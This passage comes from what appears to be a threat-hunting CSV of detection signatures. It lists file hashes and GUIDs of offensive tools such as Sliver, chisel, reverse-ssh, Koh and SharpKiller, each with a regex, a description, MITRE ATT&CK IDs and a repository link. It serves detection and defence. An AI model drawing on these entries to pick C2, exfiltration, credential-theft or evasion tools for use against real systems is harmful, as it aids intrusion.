fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98*",".{0,1000}4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52*",".{0,1000}4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e*",".{0,1000}4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04*",".{0,1000}4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50*",".{0,1000}4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64*",".{0,1000}4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa*",".{0,1000}4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8*",".{0,1000}4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5*",".{0,1000}4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5*",".{0,1000}4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8*",".{0,1000}4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*4C3B106C-8782-4374-9459-851749072123*",".{0,1000}4C3B106C\-8782\-4374\-9459\-851749072123.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b*",".{0,1000}4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4C574B86-DC07-47EA-BB02-FD50AE002910*",".{0,1000}4C574B86\-DC07\-47EA\-BB02\-FD50AE002910.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200*",".{0,1000}4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01*",".{0,1000}4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633*",".{0,1000}4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*4caedf29083d75d0d6687f56981fda77cce0849f*",".{0,1000}4caedf29083d75d0d6687f56981fda77cce0849f.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4*",".{0,1000}4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e*",".{0,1000}4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4cec28b4c00002245dffc8346be0cc11*",".{0,1000}4cec28b4c00002245dffc8346be0cc11.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*",".{0,1000}4D1B765D\-1287\-45B1\-AEDC\-C4B96CF5CAA2.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" 
"*4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1*",".{0,1000}4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d*",".{0,1000}4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*",".{0,1000}4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
"*4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263*",".{0,1000}4d2f66539f067f631db31039ec81707028bb37efcd2ebbf86a1a920d60d75263.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb*",".{0,1000}4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f*",".{0,1000}4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4d5350c8-7f8c-47cf-8cde-c752018af17e*",".{0,1000}4d5350c8\-7f8c\-47cf\-8cde\-c752018af17e.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc*",".{0,1000}4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*4D7AEF0B-5AA6-4AE5-971E-7141AA1FDAFC*",".{0,1000}4D7AEF0B\-5AA6\-4AE5\-971E\-7141AA1FDAFC.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*4D7BA537-54EC-4005-9CC2-AE134B4526F9*",".{0,1000}4D7BA537\-54EC\-4005\-9CC2\-AE134B4526F9.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10*",".{0,1000}4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45*",".{0,1000}4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4DD3206C-F14A-43A3-8EA8-88676810B8CD*",".{0,1000}4DD3206C\-F14A\-43A3\-8EA8\-88676810B8CD.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" 
"*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*",".{0,1000}4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445*",".{0,1000}4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4DE43724-3851-4376-BB6C-EA15CF500C44*",".{0,1000}4DE43724\-3851\-4376\-BB6C\-EA15CF500C44.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" 
"*4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f*",".{0,1000}4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb*",".{0,1000}4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*",".{0,1000}4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" 